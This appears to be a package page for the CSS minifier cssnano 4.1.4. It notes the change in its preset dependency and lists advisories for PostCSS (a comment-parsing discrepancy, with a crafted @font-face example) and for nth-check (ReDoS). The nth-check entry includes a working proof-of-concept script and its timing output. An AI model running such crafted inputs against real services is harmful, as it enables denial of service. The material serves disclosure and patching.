Cssnano version 4.1.4 represents a minor update in this modular CSS minifier built on the PostCSS ecosystem, following closely after version 4.1.3. The core functionality remains consistent, providing developers with a tool to optimize and reduce the file size of their CSS stylesheets. Both versions depend on PostCSS (version 7.0.0 or higher), cosmiconfig (version 5.0.0 or higher), and is-resolvable (version 1.0.0 or higher), crucial dependencies for configuration and module resolution. However, the key difference lies in the version of cssnano-preset-default its dependency, updated from 4.0.1 in version 4.1.3 to 4.0.2 in version 4.1.4.
This seemingly incremental change in cssnano-preset-default is significant. The preset dictates the default optimization settings applied by cssnano, influencing how CSS is minified. Therefore, version 4.1.4 offers potential improvements in minification efficiency or bug fixes addressed within the preset, relative to version 4.1.3. While development dependencies like webpack, babel, and related utilities remain largely consistent, the subtle shift in the default preset underscores the commitment to refining core minification behaviors between these versions. Developers should keep track of the bug fixes and functionalities delivered by the cssnano-preset-default library to understand whether it is worth it to update the version.
All the vulnerabilities related to the version 4.1.4 of the package
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms